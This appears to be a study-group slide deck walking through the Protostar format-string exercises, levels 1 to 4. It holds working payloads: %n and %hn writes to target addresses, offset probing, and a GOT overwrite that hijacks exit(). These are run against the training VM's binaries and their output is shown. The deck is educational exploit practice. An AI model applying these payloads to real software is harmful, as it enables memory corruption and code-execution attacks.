Tachikoma 2013-01
- 2. Menu
• Fusion lv.02, 03, 04
• 5 minutes python
Monday, January 28, 13
- 7. Menu
• Protostar format lv.01, 02, 03, 04
• I'm doing a lot of these, so please forgive me…
• 5 minutes python
• import "university assignment"
- 9. Protostar format 1
• All we have to do is overwrite int target
• In C, global variables are initialized to 0
• Goal: make it anything other than 0
- 10. Protostar format 1
• Looks like we just need to play with argv[1]
• Find how far we have to pop before it shows up
• It's an int, so 4 bytes
• AAAA%x....
• Can't find it by hand…
- 12. Protostar format 1
• Around 132?
• printf("AAAA%132$x", <- same as this);
• seems to be what it turns into?
- 13. Protostar format 1
• Let's use %n to overwrite it
• ./format1 `python -c 'print "\x38\x96\x04\x08xx%132$n"'`
• 8xxyou have modified the target :)
- 15. Protostar format 2
• What changed
• Input comes from stdin instead of argv
• Apparently target has to be set to 64
- 16. Protostar format 2
• Pop and search like in 1
• user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2
• AAAA200,b7fd8420,bffff564,41414141
• target is 0 :(
• This time 4 is enough
- 17. Protostar format 2
• Address of target
• user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
• 080496e4 g O .bss 00000004 target
• Try it the same way as in 1
• user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2
• ?
• target is 4 :(
- 18. Protostar format 2
• target became 4!
• %n is the number of characters written so far, right!
• Try it
• user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08x%4$n"' | ./format2
• x
• target is 5 :(
- 19. Protostar format 2
• Try once more
• user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08xx%4$n"' | ./format2
• xx
• target is 6 :(
• And 64-4=60, so…
• user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08" + "x"*60 + "%4$n"' | ./format2
• xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
• you have modified the target :)
- 21. Protostar format 3
• What changed
• printf() isn't called directly; a printbuffer(char *) wrapper sits in between
• We have to write a lot more into target
- 22. Protostar format 3
• First, try the same thing
• user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3
• AAAAxx0,bffff520,b7fd7ff4,0
• target is 00000000 :(
- 25. Protostar format 3
• Very well, then it's Python
• user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
• AAAAxx,0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252c7878,78252c78,2c78252c,252c7825
• target is 00000000 :(
• It was the 12th one
- 26. Protostar format 3
• Address of target
• user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target
• 080496f4 g O .bss 00000004 target
- 27. Protostar format 3
• Try it
• python -c 'print "\xf4\x96\x04\x08" + "x"*256 + "%12$n"' | ./format3
• xxxxxxxxxxxxxxxxxxxxx(snip)
• target is 00000104 :(
• Doesn't work
- 29. Protostar format 3
• Try it
• python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n%14$n"' | ./format3
• ?
• target is 000c0c0c :(
- 30. Protostar format 3
• Add various amounts of padding
• python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3
• xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
• you have modified the target :)
- 32. Protostar format 4
• What changed
• Overwrite the GOT instead of target
• Goal
• call hello()
- 33. Protostar format 4
• Address of hello
• # objdump -d ./format4 | grep hello [/opt/protostar/bin]
• 080484b4 <hello>:
- 36. Protostar format 4
• pop, pop, pop...
• python -c "print 'AAAA' + ',%x'*4" | ./format4
• AAAA,200,b7fd8420,bffff9c4,41414141
• It was the 4th one
- 38. Protostar format 4
• objdump -R ./format4 | grep exit
• 08049718 R_386_JUMP_SLOT _exit
• 08049724 R_386_JUMP_SLOT exit
- 39. Protostar format 4
• We just need to overwrite 0x08049724 with hello()…
• python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4
• [1] 4950 done python -c |
• 4951 segmentation fault ./format4
• Did you mean: input too long
- 40. Protostar format 4
• Google("help me");
• %nd (n any integer) will pad it out, right
• Apparently that's the normal way to get n bytes of padding…
- 41. Protostar format 4
• Try once more
• python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4
• $%'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
• code execution redirected! you win